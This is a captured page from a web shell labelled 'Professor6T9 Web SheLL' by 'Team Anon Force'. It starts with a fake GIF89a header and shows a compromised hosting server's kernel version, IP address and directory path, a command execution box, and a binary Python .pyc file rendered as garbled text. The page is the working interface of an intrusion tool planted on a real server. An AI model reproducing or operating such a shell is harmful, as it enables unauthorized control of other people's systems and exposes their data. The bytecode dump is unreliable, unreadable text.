GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux premium264.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
LiteSpeed
69.57.162.12
/
opt
/
cloudlinux
/
venv
/
lib64
/
python3.11
/
site-packages
/
numpy
/
array_api
/
__pycache__
[ HOME ]
Exec
Submit
File Name : _manipulation_functions.cpython-311.pyc
� � h� � � � d dl mZ ddlmZ ddlmZ d dlmZmZm Z m Z d dlZd d�d!d�Z d"d�Zdd�d#d�Zd$d�Zdd�d%d�Zdd�d&d�Zd'd�Zd d�d(d �ZdS ))� )�annotations� )�Array)�result_type)�List�Optional�Tuple�UnionN��axis�arrays�%Union[Tuple[Array, ...], List[Array]]r � Optional[int]�returnr c � � t | � }t d� | D � � � � } t j t j | ||�� � � � S )z� Array API compatible wrapper for :py:func:`np.concatenate <numpy.concatenate>`. See its docstring for more information. c 3 �$ K � | ]}|j V � �d S �N��_array��.0�as �z/builddir/build/BUILD/cloudlinux-venv-1.0.8/venv/lib64/python3.11/site-packages/numpy/array_api/_manipulation_functions.py� <genexpr>zconcat.<locals>.<genexpr> �$ � � � �,�,��1�8�,�,�,�,�,�,� )r �dtype)r �tupler �_new�np�concatenate)r r r s r �concatr"